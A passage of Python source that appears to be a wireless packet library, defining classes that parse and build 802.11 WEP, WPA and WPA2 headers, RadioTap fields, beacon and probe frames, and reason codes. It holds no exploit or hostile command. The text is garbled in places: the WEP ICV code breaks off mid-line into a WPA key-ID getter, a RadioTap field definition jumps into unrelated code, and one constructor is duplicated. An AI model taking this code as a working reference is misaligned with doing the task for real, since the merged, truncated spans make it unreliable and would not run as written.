masked | ((value & 0x00FFFFFF) << 8) self.header.set_long(0, nb) def get_protoID(self): "Get the two-octet Protocol Identifier (PID) SNAP field" return self.header.get_word(3, ">") def set_protoID(self, value): "Set the two-octet Protocol Identifier (PID) SNAP field" self.header.set_word(3, value, ">") class Dot11WEP(ProtocolPacket): '802.11 WEP' def __init__(self, aBuffer = None): header_size = 4 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def is_WEP(self): 'Return True if it\'s a WEP' # We already know that it's private. # Now we must differentiate between WEP and WPA/WPA2 # WPA/WPA2 have the ExtIV (Bit 5) enaled and WEP disabled b = self.header.get_byte(3) return not (b & 0x20) def get_iv(self): 'Return the \'WEP IV\' field' b=self.header.get_bytes()[0:3].tostring() #unpack requires a string argument of length 4 and b is 3 bytes long (iv,)=struct.unpack('!L', '\x00'+b) return iv def set_iv(self, value): 'Set the \'WEP IV\' field.' # clear the bits mask = ((~0xFFFFFF00) & 0xFF) masked = self.header.get_long(0, ">") & mask # set the bits nb = masked | ((value & 0x00FFFFFF) << 8) self.header.set_long(0, nb) def get_keyid(self): 'Return the \'WEP KEY ID\' field' b = self.header.get_byte(3) return ((b>>6) & 0x03) def set_keyid(self, value): 'Set the \'WEP KEY ID\' field' # clear the bits mask = (~0xC0) & 0xFF masked = self.header.get_byte(3) & mask # set the bits nb = masked | ((value & 0x03) << 6) self.header.set_byte(3, nb) def get_decrypted_data(self, key_string): 'Return \'WEP Data\' field decrypted' # Needs to be at least 8 bytes of payload if len(self.body_string)<8: return self.body_string # initialize the first bytes of the key from the IV # and copy rest of the WEP key (the secret part) # Convert IV to 3 bytes long string iv=struct.pack('>L',self.get_iv())[-3:] key=iv+key_string rc4=RC4(key) decrypted_data=rc4.decrypt(self.body_string) return decrypted_data def get_encrypted_data(self, key_string): # RC4 is symmetric return self.get_decrypted_data(key_string) def encrypt_frame(self, key_string): enc = self.get_encrypted_data(key_string) self.load_body(enc) class Dot11WEPData(ProtocolPacket): '802.11 WEP Data Part' def __init__(self, aBuffer = None): header_size = 0 tail_size = 4 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_icv(self): "Return 'WEP ICV' field" b = self.tail.get_long(-4, ">") return b def set_icv(self, value = None): "Set 'WEP ICV' field" # Compute the WEP ICV if value is None: value=self.get_computed_icv() # set the bits nb = value & 0xFFFFFFFF self.tail.set_long(-4, nb) def get_computed_icv(self): crcle=crc32(self.body_string)&0xffffffffL # This crc32 is in little endian, convert it to big endian crc=struct.pack('>6) & 0x03) def set_keyid(self, value): 'Set the \'WPA KEY ID\' field' # clear the bits mask = (~0xC0) & 0xFF masked = self.header.get_byte(3) & mask # set the bits nb = masked | ((value & 0x03) << 6) self.header.set_byte(3, nb) def get_decrypted_data(self): 'Return \'WPA Data\' field decrypted' # TODO: Replace it with the decoded string return self.body_string def get_TSC1(self): 'Return the \'WPA TSC1\' field' b = self.header.get_byte(0) return (b & 0xFF) def set_TSC1(self, value): 'Set the \'WPA TSC1\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(0, nb) def get_WEPSeed(self): 'Return the \'WPA WEPSeed\' field' b = self.header.get_byte(1) return (b & 0xFF) def set_WEPSeed(self, value): 'Set the \'WPA WEPSeed\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(1, nb) def get_TSC0(self): 'Return the \'WPA TSC0\' field' b = self.header.get_byte(2) return (b & 0xFF) def set_TSC0(self, value): 'Set the \'WPA TSC0\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(2, nb) def get_extIV(self): 'Return the \'WPA extID\' field' b = self.header.get_byte(3) return ((b>>5) & 0x1) def set_extIV(self, value): 'Set the \'WPA extID\' field' # clear the bits mask = (~0x20) & 0xFF masked = self.header.get_byte(3) & mask # set the bits nb = masked | ((value & 0x01) << 5) self.header.set_byte(3, nb) def get_TSC2(self): 'Return the \'WPA TSC2\' field' b = self.header.get_byte(4) return (b & 0xFF) def set_TSC2(self, value): 'Set the \'WPA TSC2\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(4, nb) def get_TSC3(self): 'Return the \'WPA TSC3\' field' b = self.header.get_byte(5) return (b & 0xFF) def set_TSC3(self, value): 'Set the \'WPA TSC3\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(5, nb) def get_TSC4(self): 'Return the \'WPA TSC4\' field' b = self.header.get_byte(6) return (b & 0xFF) def set_TSC4(self, value): 'Set the \'WPA TSC4\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(6, nb) def get_TSC5(self): 'Return the \'WPA TSC5\' field' b = self.header.get_byte(7) return (b & 0xFF) def set_TSC5(self, value): 'Set the \'WPA TSC5\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(7, nb) class Dot11WPAData(ProtocolPacket): '802.11 WPA Data Part' def __init__(self, aBuffer = None): header_size = 0 tail_size = 12 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_icv(self): "Return 'WPA ICV' field" b = self.tail.get_long(-4, ">") return b def set_icv(self, value = None): "Set 'WPA ICV' field" # calculate the FCS if value is None: value=self.compute_checksum(self.body_string) # set the bits nb = value & 0xFFFFFFFF self.tail.set_long(-4, nb) def get_MIC(self): 'Return the \'WPA2Data MIC\' field' return self.get_tail_as_string()[:8] def set_MIC(self, value): 'Set the \'WPA2Data MIC\' field' #Padding to 8 bytes with 0x00's value.ljust(8,'\x00') #Stripping to 8 bytes value=value[:8] icv=self.tail.get_buffer_as_string()[-4:] self.tail.set_bytes_from_string(value+icv) class Dot11WPA2(ProtocolPacket): '802.11 WPA2' def __init__(self, aBuffer = None): header_size = 8 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def is_WPA2(self): 'Return True if it\'s a WPA2' # Now we must differentiate between WPA and WPA2 # In WPA WEPSeed is set to (TSC1 | 0x20) & 0x7f. # In WPA2 WEPSeed=PN1 and TSC1=PN0 b = self.get_PN1() == ((self.get_PN0() | 0x20 ) & 0x7f) return (not b and self.get_extIV()) def get_extIV(self): 'Return the \'WPA2 extID\' field' b = self.header.get_byte(3) return ((b>>5) & 0x1) def set_extIV(self, value): 'Set the \'WPA2 extID\' field' # clear the bits mask = (~0x20) & 0xFF masked = self.header.get_byte(3) & mask # set the bits nb = masked | ((value & 0x01) << 5) self.header.set_byte(3, nb) def get_keyid(self): 'Return the \'WPA2 KEY ID\' field' b = self.header.get_byte(3) return ((b>>6) & 0x03) def set_keyid(self, value): 'Set the \'WPA2 KEY ID\' field' # clear the bits mask = (~0xC0) & 0xFF masked = self.header.get_byte(3) & mask # set the bits nb = masked | ((value & 0x03) << 6) self.header.set_byte(3, nb) def get_decrypted_data(self): 'Return \'WPA2 Data\' field decrypted' # TODO: Replace it with the decoded string return self.body_string def get_PN0(self): 'Return the \'WPA2 PN0\' field' b = self.header.get_byte(0) return (b & 0xFF) def set_PN0(self, value): 'Set the \'WPA2 PN0\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(0, nb) def get_PN1(self): 'Return the \'WPA2 PN1\' field' b = self.header.get_byte(1) return (b & 0xFF) def set_PN1(self, value): 'Set the \'WPA2 PN1\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(1, nb) def get_PN2(self): 'Return the \'WPA2 PN2\' field' b = self.header.get_byte(4) return (b & 0xFF) def set_PN2(self, value): 'Set the \'WPA2 PN2\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(4, nb) def get_PN3(self): 'Return the \'WPA2 PN3\' field' b = self.header.get_byte(5) return (b & 0xFF) def set_PN3(self, value): 'Set the \'WPA2 PN3\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(5, nb) def get_PN4(self): 'Return the \'WPA2 PN4\' field' b = self.header.get_byte(6) return (b & 0xFF) def set_PN4(self, value): 'Set the \'WPA2 PN4\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(6, nb) def get_PN5(self): 'Return the \'WPA2 PN5\' field' b = self.header.get_byte(7) return (b & 0xFF) def set_PN5(self, value): 'Set the \'WPA2 PN5\' field' # set the bits nb = (value & 0xFF) self.header.set_byte(7, nb) class Dot11WPA2Data(ProtocolPacket): '802.11 WPA2 Data Part' def __init__(self, aBuffer = None): header_size = 0 tail_size = 8 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_MIC(self): 'Return the \'WPA2Data MIC\' field' return self.get_tail_as_string() def set_MIC(self, value): 'Set the \'WPA2Data MIC\' field' #Padding to 8 bytes with 0x00's value.ljust(8,'\x00') #Stripping to 8 bytes value=value[:8] self.tail.set_bytes_from_string(value) class RadioTap(ProtocolPacket): __HEADER_BASE_SIZE = 8 # minimal header size class __RadioTapField(object): ALIGNMENT = 1 def __str__( self ): return str( self.__class__.__name__ ) class RTF_TSFT(__RadioTapField): BIT_NUMBER = 0 STRUCTURE = "')) if len(values)!=num_fields: raise Exception("Field %s has exactly %d items"%(str(field),struct.calcsize(field.STRUCTURE))) is_present=self.get_present_bit(field) if is_present is False: self.__set_present_bit(field) byte_pos=self.__get_field_position(field) header=self.get_header_as_string() total_length=struct.calcsize(field.STRUCTURE) v=header[ byte_pos:byte_pos+total_length ] new_str = struct.pack(field.STRUCTURE, *values) if is_present is True: header=header[:byte_pos]+new_str+header[byte_pos+total_length:] else: header=header[:byte_pos]+new_str+header[byte_pos:] self.load_header(header) def set_tsft( self, nvalue ): "Set the Value in microseconds of the MAC's 64-bit 802.11 "\ "Time Synchronization Function timer when the first bit of "\ "the MPDU arrived at the MAC" self.__set_field_values(RadioTap.RTF_TSFT, [nvalue]) def get_tsft( self ): "Get the Value in microseconds of the MAC's 64-bit 802.11 "\ "Time Synchronization Function timer when the first bit of "\ "the MPDU arrived at the MAC" values=self.__get_field_values(RadioTap.RTF_TSFT) if not values: return None return values[0] def set_flags( self, nvalue ): "Set the properties of transmitted and received frames." self.__set_field_values(self.RTF_FLAGS, [nvalue]) def get_flags( self ): "Get the properties of transmitted and received frames." values=self.__get_field_values(self.RTF_FLAGS) if not values: return None return values[0] def set_rate( self, nvalue ): "Set the TX/RX data rate in 500 Kbps units" self.__set_field_values(self.RTF_RATE, [nvalue]) def get_rate( self ): "Get the TX/RX data rate in 500 Kbps units" values=self.__get_field_values(self.RTF_RATE) if not values: return None return values[0] def set_channel( self, freq, flags ): "Set the channel Tx/Rx frequency in MHz and the channel flags" self.__set_field_values(self.RTF_CHANNEL, [freq, flags]) def get_channel( self ): "Get the TX/RX data rate in 500 Kbps units" values=self.__get_field_values(self.RTF_CHANNEL) return values def set_FHSS( self, hop_set, hop_pattern ): "Set the hop set and pattern for frequency-hopping radios" self.__set_field_values(self.RTF_FHSS, [hop_set, hop_pattern]) def get_FHSS( self ): "Get the hop set and pattern for frequency-hopping radios" values=self.__get_field_values(self.RTF_FHSS) return values def set_dBm_ant_signal( self, signal ): "Set the RF signal power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." self.__set_field_values(self.RTF_DBM_ANTSIGNAL, [signal]) def get_dBm_ant_signal( self ): "Get the RF signal power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." values=self.__get_field_values(self.RTF_DBM_ANTSIGNAL) if not values: return None return values[0] def set_dBm_ant_noise( self, signal ): "Set the RF noise power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." self.__set_field_values(self.RTF_DBM_ANTNOISE, [signal]) def get_dBm_ant_noise( self ): "Get the RF noise power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." values=self.__get_field_values(self.RTF_DBM_ANTNOISE) if not values: return None return values[0] def set_lock_quality( self, quality ): "Set the quality of Barker code lock. "\ "Called 'Signal Quality' in datasheets. " self.__set_field_values(self.RTF_LOCK_QUALITY, [quality]) def get_lock_quality( self ): "Get the quality of Barker code lock. "\ "Called 'Signal Quality' in datasheets. " values=self.__get_field_values(self.RTF_LOCK_QUALITY) if not values: return None return values[0] def set_tx_attenuation( self, power ): "Set the transmit power expressed as unitless distance from max power "\ "set at factory calibration. 0 is max power." self.__set_field_values(self.RTF_TX_ATTENUATION, [power]) def get_tx_attenuation( self ): "Set the transmit power expressed as unitless distance from max power "\ "set at factory calibration. 0 is max power." values=self.__get_field_values(self.RTF_TX_ATTENUATION) if not values: return None return values[0] def set_dB_tx_attenuation( self, power ): "Set the transmit power expressed as decibel distance from max power "\ "set at factory calibration. 0 is max power. " self.__set_field_values(self.RTF_DB_TX_ATTENUATION, [power]) def get_dB_tx_attenuation( self ): "Set the transmit power expressed as decibel distance from max power "\ "set at factory calibration. 0 is max power. " values=self.__get_field_values(self.RTF_DB_TX_ATTENUATION) if not values: return None return values[0] def set_dBm_tx_power( self, power ): "Set the transmit power expressed as dBm (decibels from a 1 milliwatt"\ " reference). This is the absolute power level measured at the "\ "antenna port." self.__set_field_values(self.RTF_DBM_TX_POWER, [power]) def get_dBm_tx_power( self ): "Get the transmit power expressed as dBm (decibels from a 1 milliwatt"\ " reference). This is the absolute power level measured at the "\ "antenna port." values=self.__get_field_values(self.RTF_DBM_TX_POWER) if not values: return None return values[0] def set_antenna( self, antenna_index ): "Set Rx/Tx antenna index for this packet. "\ "The first antenna is antenna 0. "\ self.__set_field_values(self.RTF_ANTENNA, [antenna_index]) def get_antenna( self ): "Set Rx/Tx antenna index for this packet. "\ "The first antenna is antenna 0. "\ values=self.__get_field_values(self.RTF_ANTENNA) if not values: return None return values[0] def set_dB_ant_signal( self, signal ): "Set the RF signal power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." self.__set_field_values(self.RTF_DB_ANTSIGNAL, [signal]) def get_dB_ant_signal( self ): "Get the RF signal power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." values=self.__get_field_values(self.RTF_DB_ANTSIGNAL) if not values: return None return values[0] def set_dB_ant_noise( self, signal ): "Set the RF noise power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." self.__set_field_values(self.RTF_DB_ANTNOISE, [signal]) def get_dB_ant_noise( self ): "Get the RF noise power at the antenna, decibel difference from an "\ "arbitrary, fixed reference." values=self.__get_field_values(self.RTF_DB_ANTNOISE) if not values: return None return values[0] ## def set_rx_flags( self, flags ): ## "Set the properties of received frames." ## ## self.__set_field_values(self.RTF_RX_FLAGS, [flags]) ## ## def get_rx_flags( self ): ## "Get the properties of received frames." ## ## values=self.__get_field_values(self.RTF_RX_FLAGS) ## if not values: ## return None ## return values[0] def set_FCS_in_header( self, fcs ): "Set the Field containing the FCS of the frame (instead of it being "\ "appended to the frame as it would appear on the air.) " self.__set_field_values(self.RTF_FCS_IN_HEADER, [fcs]) def get_FCS_in_header( self ): "Get the Field containing the FCS of the frame (instead of it being "\ "appended to the frame as it would appear on the air.) " values=self.__get_field_values(self.RTF_FCS_IN_HEADER) if not values: return None return values[0] ## def set_RSSI( self, rssi, max_rssi ): ## "Set the received signal strength and the maximum for the hardware." ## ## self.__set_field_values(self.RTF_RSSI, [rssi, max_rssi]) ## ## def get_RSSI( self ): ## "Get the received signal strength and the maximum for the hardware." ## ## values=self.__get_field_values(self.RTF_RSSI) ## ## return values def set_RTS_retries( self, retries): "Set the number of RTS retries a transmitted frame used." self.__set_field_values(self.RTF_RTS_RETRIES, [retries]) def get_RTS_retries( self ): "Get the number of RTS retries a transmitted frame used." values=self.__get_field_values(self.RTF_RTS_RETRIES) if not values: return None return values[0] def set_tx_flags( self, flags ): "Set the properties of transmitted frames." self.__set_field_values(self.RTF_TX_FLAGS, [flags]) def get_tx_flags( self ): "Get the properties of transmitted frames." values=self.__get_field_values(self.RTF_TX_FLAGS) if not values: return None return values[0] def set_xchannel( self, flags, freq, channel, maxpower ): "Set extended channel information: flags, freq, channel and maxpower" self.__set_field_values(self.RTF_XCHANNEL, [flags, freq, channel, maxpower] ) def get_xchannel( self ): "Get extended channel information: flags, freq, channel and maxpower" values=self.__get_field_values(field=self.RTF_XCHANNEL) return values def set_data_retries( self, retries ): "Set the number of data retries a transmitted frame used." self.__set_field_values(self.RTF_DATA_RETRIES, [retries]) def get_data_retries( self ): "Get the number of data retries a transmitted frame used." values=self.__get_field_values(self.RTF_DATA_RETRIES) if not values: return None return values[0] def set_hardware_queue( self, queue ): "Set the hardware queue to send the frame on." self.__set_field_values(self.RTF_HARDWARE_QUEUE, [queue]) ## def get_hardware_queue( self ): ## "Get the hardware queue to send the frame on." ## ## values=self.__get_field_values(self.RTF_HARDWARE_QUEUE) ## if not values: ## return None ## return values[0] def __update_header_length(self): 'Update the RadioTap header length field with the real size' self.header.set_word(2, self.get_header_size(), "<") def get_packet(self): self.__update_header_length() return ProtocolPacket.get_packet(self) class Dot11ManagementFrame(ProtocolPacket): '802.11 Management Frame' def __init__(self, aBuffer = None): header_size = 22 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def __init__(self, aBuffer = None): header_size = 22 tail_size = 0 ProtocolPacket.__init__(self, header_size, tail_size) if(aBuffer): self.load_packet(aBuffer) def get_duration(self): 'Return 802.11 Management frame \'Duration\' field' b = self.header.get_word(0, "<") return b def set_duration(self, value): 'Set the 802.11 Management frame \'Duration\' field' # set the bits nb = value & 0xFFFF self.header.set_word(0, nb, "<") def get_destination_address(self): 'Return 802.11 Management frame \'Destination Address\' field as a 6 bytes array' return self.header.get_bytes()[2:8] def set_destination_address(self, value): 'Set 802.11 Management frame \'Destination Address\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(2+i, value[i]) def get_source_address(self): 'Return 802.11 Management frame \'Source Address\' field as a 6 bytes array' return self.header.get_bytes()[8:14] def set_source_address(self, value): 'Set 802.11 Management frame \'Source Address\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(8+i, value[i]) def get_bssid(self): 'Return 802.11 Management frame \'BSSID\' field as a 6 bytes array' return self.header.get_bytes()[14: 20] def set_bssid(self, value): 'Set 802.11 Management frame \'BSSID\' field as a 6 bytes array' for i in range(0, 6): self.header.set_byte(14+i, value[i]) def get_sequence_control(self): 'Return 802.11 Management frame \'Sequence Control\' field' b = self.header.get_word(20, "<") return b def set_sequence_control(self, value): 'Set the 802.11 Management frame \'Sequence Control\' field' # set the bits nb = value & 0xFFFF self.header.set_word(20, nb, "<") def get_fragment_number(self): 'Return 802.11 Management frame \'Fragment Number\' subfield' b = self.get_sequence_control() return (b&0x000F) def set_fragment_number(self, value): 'Set the 802.11 Management frame \'Fragment Number\' subfield' # clear the bits mask = (~0x000F) & 0xFFFF masked = self.header.get_word(20, "<") & mask # set the bits nb = masked | (value & 0x000F) self.header.set_word(20, nb, "<") def get_sequence_number(self): 'Return 802.11 Management frame \'Sequence Number\' subfield' b = self.get_sequence_control() return ((b>>4) & 0xFFF) def set_sequence_number(self, value): 'Set the 802.11 Management frame \'Sequence Number\' subfield' # clear the bits mask = (~0xFFF0) & 0xFFFF masked = self.header.get_word(20, "<") & mask # set the bits nb = masked | ((value & 0x0FFF ) << 4 ) self.header.set_word(20, nb, "<") def get_frame_body(self): 'Return 802.11 Management frame \'Frame Body\' field' return self.get_body_as_string() def set_frame_body(self, data): 'Set 802.11 Management frame \'Frame Body\' field' self.load_body(data) class DOT11_MANAGEMENT_ELEMENTS(): SSID = 0 SUPPORTED_RATES = 1 FH_PARAMETER_SET = 2 DS_PARAMETER_SET = 3 CF_PARAMETER_SET = 4 TIM = 5 IBSS_PARAMETER_SET = 6 COUNTRY = 7 HOPPING_PARAMETER = 8 HOPPING_TABLE = 9 REQUEST = 10 BSS_LOAD = 11 EDCA_PARAMETER_SET = 12 TSPEC = 13 TCLAS = 14 SCHEDULE = 15 CHALLENGE_TEXT = 16 # RESERVED 17-31 POWER_CONSTRAINT = 32 POWER_CAPABILITY = 33 TPC_REQUEST = 34 TPC_REPORT = 35 SUPPORTED_CHANNELS = 36 CHANNEL_SWITCH_ANN = 37 MEASURE_REQ = 38 MEASURE_REP = 39 QUIET = 40 IBSS_DFS = 41 ERP_INFO = 42 TS_DELAY = 43 TCLAS_PROCESSING = 44 #RESERVED 45 # See: IEEE 802.11n QOS_CAPABILITY = 46 #RESERVED 47 # See: IEEE 802.11g RSN = 48 #RESERVED 49 EXT_SUPPORTED_RATES = 50 #RESERVED 51-126 EXTENDED_CAPABILITIES = 127 #RESERVED 128-220 VENDOR_SPECIFIC = 221 #RESERVED 222-255 class Dot11ManagementHelper(ProtocolPacket): def __init__(self, header_size, tail_size, aBuffer = None): self.__HEADER_BASE_SIZE=header_size if aBuffer: elements_length=self.__calculate_elements_length(aBuffer[self.__HEADER_BASE_SIZE:]) header_size+=elements_length ProtocolPacket.__init__(self, header_size, tail_size) self.load_packet(aBuffer) else: ProtocolPacket.__init__(self, header_size, tail_size) def _find_element(self, elements, element_id ): remaining=len(elements) offset=0 while remaining > 0: (id,length)=struct.unpack("!BB",elements[offset:offset+2]) if element_id is None: pass # through the whole list returning the length elif id==element_id: yield (0,offset,length+2) # == elif id>element_id: yield (1,offset,None) # > length+=2 #id+length offset+=length if length>remaining: # Error!! length = remaining; remaining-=length # < Not found yield (-1, offset, None) def __calculate_elements_length(self, elements): gen_tp=self._find_element(elements, None ) (match,offset,length)=gen_tp.next() if match != -1: # element_id is None, then __find_tagged_parameter must return -1 raise Exception("Internal Error %s"%match) return offset def _get_elements_generator(self, element_id): elements=self.get_header_as_string()[self.__HEADER_BASE_SIZE:] gen_tp=self._find_element(elements, element_id ) while True: (match,offset,length)=gen_tp.next() if match != 0: return value_offset=offset+2 value_end=offset+length value=elements[value_offset:value_end] yield value def _get_element(self, element_id): gen_get_element=self._get_elements_generator(element_id) try: s=gen_get_element.next() if s is None: raise Exception("gen_get_element salio con None in _get_element!!!") return s except StopIteration: pass return None def delete_element(self, element_id, multiple = False): header=self.get_header_as_string() elements=header[self.__HEADER_BASE_SIZE:] gen_tp=self._find_element(elements, element_id ) found=False while True: (match,offset,length)=gen_tp.next() if match != 0: break start=self.__HEADER_BASE_SIZE+offset header=header[:start]+header[start+length:] found=True if multiple is False: break if not found: return False self.load_header(header) return True def _set_element(self, element_id, value, replace = True): parameter=struct.pack('BB%ds'%len(value),element_id,len(value),value) header=self.get_header_as_string() elements=header[self.__HEADER_BASE_SIZE:] gen_tp=self._find_element(elements, element_id ) found=False while True: (match,offset,length)=gen_tp.next() start=self.__HEADER_BASE_SIZE+offset if match == 0 and replace: # Replace header=header[:start]+parameter+header[start+length:] found=True break elif match > 0: # Add header=header[:start]+parameter+header[start:] found=True break else: break if not found: # Append (found<0 Not found) header=header+parameter self.load_header(header) class Dot11ManagementBeacon(Dot11ManagementHelper): '802.11 Management Beacon Frame' __HEADER_BASE_SIZE = 12 # minimal header size def __init__(self, aBuffer = None): header_size = self.__HEADER_BASE_SIZE tail_size = 0 Dot11ManagementHelper.__init__(self, header_size, tail_size, aBuffer) def get_timestamp(self): 'Return the 802.11 Management Beacon frame \'Timestamp\' field' b = self.header.get_long_long(0, "<") return b def set_timestamp(self, value): 'Set the 802.11 Management Beacon frame \'Timestamp\' field' # set the bits nb = value & 0xFFFFFFFFFFFFFFFF self.header.set_long_long(0, nb, "<") def get_beacon_interval(self): 'Return the 802.11 Management Beacon frame \'Beacon Inteval\' field' \ 'To convert it to seconds => secs = Beacon_Interval*1024/1000000' b = self.header.get_word(8, "<") return b def set_beacon_interval(self, value): 'Set the 802.11 Management Beacon frame \'Beacon Inteval\' field' # set the bits nb = value & 0xFFFF self.header.set_word(8, nb, "<") def get_capabilities(self): 'Return the 802.11 Management Beacon frame \'Capability information\' field. ' b = self.header.get_word(10, "<") return b def set_capabilities(self, value): 'Set the 802.11 Management Beacon frame \'Capability Information\' field' # set the bits nb = value & 0xFFFF self.header.set_word(10, nb, "<") def get_ssid(self): "Get the 802.11 Management SSID element. "\ "The SSID element indicates the identity of an ESS or IBSS." return self._get_element(DOT11_MANAGEMENT_ELEMENTS.SSID) def set_ssid(self, ssid): self._set_element(DOT11_MANAGEMENT_ELEMENTS.SSID,ssid) def get_supported_rates(self, human_readable=False): "Get the 802.11 Management Supported Rates element. "\ "Specifies up to eight rates, then an Extended Supported Rate element "\ "shall be generated to specify the remaining supported rates."\ "If human_readable is True, the rates are returned in Mbit/sec" s=self._get_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES) if s is None: return None rates=struct.unpack('%dB'%len(s),s) if not human_readable: return rates rates_Mbs=tuple(map(lambda x: (x&0x7F)*0.5,rates)) return rates_Mbs def set_supported_rates(self, rates): "Set the 802.11 Management Supported Rates element. "\ "Specifies a tuple or list with up to eight rates, then an "\ "Extended Supported Rate element shall be generated to specify "\ "the remaining supported rates." qty_rates=len(rates) if qty_rates>8: raise Exception("requires up to eight rates") rates_string=struct.pack('B'*qty_rates,*rates) self._set_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES,rates_string) def get_ds_parameter_set(self): "Get the 802.11 Management DS Parameter set element. "\ "Contains information to allow channel number identification for "\ "STAs using a DSSS PHY." s=self._get_element(DOT11_MANAGEMENT_ELEMENTS.DS_PARAMETER_SET) if s is None: return None (ch,)=struct.unpack('B',s) return ch def set_ds_parameter_set(self, channel): "Set the 802.11 Management DS Parameter set element. "\ "Contains information to allow channel number identification for "\ "STAs using a DSSS PHY." channel_string=struct.pack('B',channel) self._set_element(DOT11_MANAGEMENT_ELEMENTS.DS_PARAMETER_SET,channel_string) def get_rsn(self): "Get the 802.11 Management Robust Security Network element." s = self._get_element(DOT11_MANAGEMENT_ELEMENTS.RSN) if s is None: return None return s def set_rsn(self, data): "Set the 802.11 Management Robust Security Network element." self._set_element(DOT11_MANAGEMENT_ELEMENTS.RSN, data) def get_vendor_specific(self): "Get the 802.11 Management Vendor Specific elements "\ "as a list of tuples." "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" vs=[] gen_get_element=self._get_elements_generator(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC) try: while 1: s=gen_get_element.next() if s is None: raise Exception("gen_get_element salio con None!!!") # OUI is 3 bytes oui=s[:3] data=s[3:] vs.append((oui,data)) except StopIteration: pass return vs def add_vendor_specific(self, oui, data): "Set the 802.11 Management Vendor Specific element. "\ "The Vendor Specific information element is used to carry "\ "information not defined in the standard within a single "\ "defined format" # 3 is the OUI length max_data_len=255-3 data_len=len(data) if data_len>max_data_len: raise Exception("data allow up to %d bytes long" % max_data) if len(oui) > 3: raise Exception("oui is three bytes long") self._set_element(DOT11_MANAGEMENT_ELEMENTS.VENDOR_SPECIFIC,oui+data, replace=False) class Dot11ManagementProbeRequest(Dot11ManagementHelper): '802.11 Management Probe Request Frame' def __init__(self, aBuffer = None): header_size = 0 tail_size = 0 Dot11ManagementHelper.__init__(self, header_size, tail_size, aBuffer) def get_ssid(self): "Get the 802.11 Management SSID element. "\ "The SSID element indicates the identity of an ESS or IBSS." return self._get_element(DOT11_MANAGEMENT_ELEMENTS.SSID) def set_ssid(self, ssid): self._set_element(DOT11_MANAGEMENT_ELEMENTS.SSID,ssid) def get_supported_rates(self, human_readable=False): "Get the 802.11 Management Supported Rates element. "\ "Specifies up to eight rates, then an Extended Supported Rate element "\ "shall be generated to specify the remaining supported rates."\ "If human_readable is True, the rates are returned in Mbit/sec" s=self._get_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES) if s is None: return None rates=struct.unpack('%dB'%len(s),s) if not human_readable: return rates rates_Mbs=tuple(map(lambda x: (x&0x7F)*0.5,rates)) return rates_Mbs def set_supported_rates(self, rates): "Set the 802.11 Management Supported Rates element. "\ "Specifies a tuple or list with up to eight rates, then an "\ "Extended Supported Rate element shall be generated to specify "\ "the remaining supported rates." qty_rates=len(rates) if qty_rates>8: raise Exception("requires up to eight rates") rates_string=struct.pack('B'*qty_rates,*rates) self._set_element(DOT11_MANAGEMENT_ELEMENTS.SUPPORTED_RATES,rates_string) class Dot11ManagementProbeResponse(Dot11ManagementBeacon): '802.11 Management Probe Response Frame' def __init__(self, aBuffer = None): Dot11ManagementBeacon.__init__(self, aBuffer) class DOT11_REASON_CODES(): # RESERVED = 0 UNSPECIFIED_REASON = 1 PREV_AUTH_NO_LONGER_VALID = 2 DEAUTH_STA_IS_LEAVING = 3 DISASS_DUE_TO_INACTIVITY = 4 DISASS_AP_UNABLE_HANDLE_ALL_STA = 5 C2_FRAME_FROM_NONAUTHENTICATED_STA = 6 C3_FRAME_FROM_NONASSOCIATED_STA = 7 DISSASS_STA_IS_LEAVING = 8 STA_REQ_NOT_AUTH_STA = 9 DISASS_POWER_CAP_IE_UNNACCEPTABLE = 10 DISASS_SUP_CH_IE_UNNACCEPTABLE = 11 # RESERVED = 12 INVALID_IE = 13 MIC_FAILURE = 14 FOUR_WAY_HANDSHAKE_TIMEOUT = 15 GROUP_KEY_HANDSHAKE_TIMEOUT = 16 IE_FOUR_WAY_HANDSHAKE_DIFFERENT = 17 INVALID_GROUP_CIPHER = 18 INVALID_PAIRWISE_CIPHER = 19 INVALID_AKMP = 20 UNSUPPORTED_RSN_IE_VERSION = 21 INVALID_RSN_IE_CAP = 22 X_AUTH_FAILED = 23 CIPHER_SUITE_REJECTED_SECURITY_POLICY = 24 # RESERVED = 25 - 31 DISASS_QOS_RELATED_REASON = 32 DISASS_QOS_UNSUFFICIENT_BANDWIDTH = 33 DISASS_EXCESSIVE_FRAMES_WITHOUT_ACK = 34 DISASS_STA_TX_OUTSIDE_TXOPS = 35 REQ_STA_LEAVING = 36 REQ_STA_NOT_WANT_MECHANISM = 37 REQ_STA_RECV_FRAMES_WHICH_SETUP_REQ = 38 REQ_STA_DUE_TIMEOUT = 39 STA_NOT_SUPPORT_CIPHER_SUITE = 45 # RESERVED = 46 - 65 535 class 